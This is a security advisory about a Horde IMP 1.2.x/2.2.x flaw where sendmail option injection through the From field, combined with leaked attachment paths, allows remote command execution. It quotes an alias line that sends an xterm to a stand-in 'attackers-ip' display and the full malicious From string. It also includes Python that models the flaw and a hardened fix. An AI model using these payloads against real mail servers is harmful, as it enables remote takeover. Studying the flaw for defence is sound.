J-Security Center

Title: Horde IMP Remote Command Execution via Sendmail Vulnerability

Severity: MODERATE

Description:

IMP is a powerful web-based mail interface/client that is developed by the members of the Horde project. Bugtraq ID 1674 detailed a vulnerability in IMP that allowed a malicious user to execute arbitrary commands on the victim host due to certain user input not being validated. The problem was partially corrected in versions 2.2.1 of IMP and 1.2.1 of Horde as checks were added to ensure that shell metacharacters were escaped.

Unfortunately, it is still possible to execute commands on a webserver running vulnerable versions (including 1.2.1/2.2.1) of Horde/IMP, due to the way sendmail is invoked and to the disclosure of file information by IMP. The problem begins where the patch left off: the passing of user input to popen(). The popen() call is used to execute sendmail, the command-line mail transfer program. The PHP script, while escaping shell metacharacters, does not check whether the data could be interpreted as command-line arguments to sendmail. As a result, it is possible to specify extra command-line options to sendmail by appending them to the FROM variable. This is the first part of the vulnerability.

The other characteristic of IMP that makes remote command execution possible has to do with the way attachments are handled. After an attachment is uploaded, a hidden form variable is set in the "compose" message window that stores the location of the temporary file on the webserver running IMP (the filename usually begins with "php" and is located in /tmp). As a result, an attacker can create on his or her local system a file that looks like this:

"evil@localhost: "|/usr/X11R6/bin/xterm -display attackers-ip:0.0"

and upload it to the remote system as an attachment, afterwards knowing exactly where it is on the filesystem. This is a sendmail alias file that will execute xterm and send it to a remote display when mail is sent to evil@localhost.

Of course, this alias file isn't really useful for the attacker unless it is actually used by sendmail.

Locally, sendmail allows the user running it to specify configuration parameters with command-line arguments. Thus, it is possible to submit a "from" variable that looks like this: "x@x -O QueueDirectory=/tmp -O AliasFile=path-of-attachment -Fx". This will cause sendmail, when executed by the PHP script, to run with /tmp as its queue directory and with whatever was uploaded as a file attachment as its alias file.

The attacker can then, after uploading the alias file, getting its location from the HTML source and setting the "from" field to the malicious parameter string, set the "To" field to evil@localhost and submit the form. As soon as sendmail sees who the message is intended for, an xterm will be sent to the destination specified in the malicious "from" parameter string.
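To make the argument-injection half of this concrete from the defender's side, here is an added Python model (not IMP's own code, which is PHP) of what the shell behind popen() does with the From value after metacharacter escaping, beside a hardened way to build the sendmail command. The escape_meta function is an assumed approximation of the 1.2.1/2.2.1 fix, and the sendmail path, the -oi flag and the address regex are assumptions.

```python
import re
import shlex
from typing import List, Optional

# Constructed samples. The malicious value is the one quoted in the advisory;
# "path-of-attachment" stands in for the /tmp path leaked by the compose form.
MALICIOUS_FROM = "x@x -O QueueDirectory=/tmp -O AliasFile=path-of-attachment -Fx"
BENIGN_FROM = "alice@example.com"

# Assumed approximation of the partial fix: shell metacharacters are
# backslash-escaped, but spaces are not, so /bin/sh still splits the value.
SHELL_META = set("#&;`'\"|*?~<>^()[]{}$\\\n")


def escape_meta(value: str) -> str:
    return "".join("\\" + c if c in SHELL_META else c for c in value)


def argv_after_shell(from_value: str) -> List[str]:
    """argv that the shell behind popen() would hand to sendmail."""
    return shlex.split("/usr/sbin/sendmail -oi -f " + escape_meta(from_value))


def injected_options(from_value: str) -> List[str]:
    """Option words sendmail would see after the intended -f <sender>."""
    argv = argv_after_shell(from_value)
    sender_pos = argv.index("-f") + 1
    return [a for a in argv[sender_pos + 1:] if a.startswith("-")]


# Hardened form: allowlist each address, never let a word start with "-", and
# build argv as a list (no shell, no word splitting) with "--" ending options.
ADDR_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9-]+(\.[A-Za-z0-9-]+)*")


def safe_address(value: str) -> Optional[str]:
    if value.startswith("-") or not ADDR_RE.fullmatch(value):
        return None
    return value


def hardened_argv(from_value: str, recipients: List[str]) -> Optional[List[str]]:
    """Return a sendmail argv, or None if any address fails validation."""
    sender = safe_address(from_value)
    rcpts = [safe_address(r) for r in recipients]
    if sender is None or any(r is None for r in rcpts):
        return None
    return ["/usr/sbin/sendmail", "-oi", "-f", sender, "--"] + rcpts
```

Running injected_options on the advisory's From string returns the three option words the shell splits out, while hardened_argv rejects the same string outright.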

This rather clever "combination" method of exploitation is a good example of how file disclosure bugs can assist attackers in exploiting more complex and serious vulnerabilities.

Affected Products:

  • Horde Horde 1.2.0
  • Horde Horde 1.2.1
  • Horde IMP 2.0.0
  • Horde IMP 2.2.0
  • Horde IMP 2.2.1

References: